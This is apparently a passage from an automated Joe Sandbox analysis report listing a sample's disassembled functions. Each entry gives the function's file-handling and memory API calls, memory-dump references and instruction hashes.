                                                                                                                                                                    Strings
                                                                                                                                                                    • failed to allocate %u bytes of memory, xrefs: 004152F0
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000005.00000002.1794572867.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000005.00000002.1794572867.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000005.00000002.1794572867.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000005.00000002.1794572867.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_lhgtogaW.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: malloc
                                                                                                                                                                    • String ID: failed to allocate %u bytes of memory
                                                                                                                                                                    • API String ID: 2803490479-1168259600
                                                                                                                                                                    • Opcode ID: 331d9f3b8e40439b36498a1be208f9c7b855b07c1663acfa81ecf9407a5950a4
                                                                                                                                                                    • Instruction ID: 0aa28a7b77b2060330bf56ee6aba3953d7f003d38adef6953018dc3bb0cf108c
                                                                                                                                                                    • Opcode Fuzzy Hash: 331d9f3b8e40439b36498a1be208f9c7b855b07c1663acfa81ecf9407a5950a4
                                                                                                                                                                    • Instruction Fuzzy Hash: 0FE026B7F01A12A3C200561AFD01AC677919FC132572B013BF92CD36C1E638D896C7A9
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 0040B1AB Relevance: 3.0, APIs: 2, Instructions: 14COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000005.00000002.1794572867.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000005.00000002.1794572867.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000005.00000002.1794572867.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000005.00000002.1794572867.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_lhgtogaW.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ??3@
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 613200358-0
                                                                                                                                                                    • Opcode ID: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
                                                                                                                                                                    • Instruction ID: 7f33cc2486ffea160e999b9abaf125df84647c5341351ad01334bd221cd3bada
                                                                                                                                                                    • Opcode Fuzzy Hash: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
                                                                                                                                                                    • Instruction Fuzzy Hash: 32D042B0404B008ED7B0DF39D401602BBF0AB093143118D2E90AAC2A50E775A0149F08
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 004062A6 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
                                                                                                                                                                      • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000005.00000002.1794572867.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000005.00000002.1794572867.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000005.00000002.1794572867.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000005.00000002.1794572867.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_lhgtogaW.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: File$PointerRead
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3154509469-0
                                                                                                                                                                    • Opcode ID: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                                                                                                                                    • Instruction ID: d794e9b43e5f56b2d2e2073d65b81241c22a9a75ad02cc9b2284f18e77a2fe0f
                                                                                                                                                                    • Opcode Fuzzy Hash: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                                                                                                                                    • Instruction Fuzzy Hash: 45E01276100100FFE6619B05DC06F57FBB9FBD4710F14883DB59596174C6326851CB25
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 0040A2EF Relevance: 1.5, APIs: 1, Instructions: 13fileCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000005.00000002.1794572867.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000005.00000002.1794572867.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000005.00000002.1794572867.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000005.00000002.1794572867.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_lhgtogaW.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: FileRead
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2738559852-0
                                                                                                                                                                    • Opcode ID: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                                                                                                                                    • Instruction ID: df780c2d30ec27a436fe2e8938b9b3026ee6fdf868a35847a3a0dbf755fefbc9
                                                                                                                                                                    • Opcode Fuzzy Hash: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                                                                                                                                    • Instruction Fuzzy Hash: 6DD0C97505020DFBDF01CF81DC06FDD7B7DFB05359F108054BA0095060C7759A15AB55
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 0040B04B Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000005.00000002.1794572867.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000005.00000002.1794572867.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000005.00000002.1794572867.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000005.00000002.1794572867.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_lhgtogaW.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ??3@
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 613200358-0
                                                                                                                                                                    • Opcode ID: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                                                                                                                                    • Instruction ID: 6ff791ec813821c2e9e24527ebed0d702daabad41f6d5d50af9b89e3d4ad0470
                                                                                                                                                                    • Opcode Fuzzy Hash: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                                                                                                                                    • Instruction Fuzzy Hash: ADC09BB15117014BE7305F15D40471373D49F11727F318C1DA5D1914C2D77CD4408518
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 00406214 Relevance: 1.3, APIs: 1, Instructions: 39COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 00406294: CloseHandle.KERNEL32(000000FF,00406224,00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF), ref: 0040629C
                                                                                                                                                                      • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                                                    • GetLastError.KERNEL32(00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF,?,00000104), ref: 00406281
                                                                                                                                                                      • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000005.00000002.1794572867.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000005.00000002.1794572867.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000005.00000002.1794572867.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000005.00000002.1794572867.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_lhgtogaW.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: File$CloseCreateErrorHandleLastRead
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2136311172-0
                                                                                                                                                                    • Opcode ID: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                                                                                                                                    • Instruction ID: 5eec059ee86d0bbb8aaa5289f200f29bbda103cdac5cb86a40c163b72aa3aa4c
                                                                                                                                                                    • Opcode Fuzzy Hash: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                                                                                                                                    • Instruction Fuzzy Hash: 3F01D6B14017018FD7206B70CD05BA273D8EF10319F11897EE55BE62D1EB3C9861866E
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%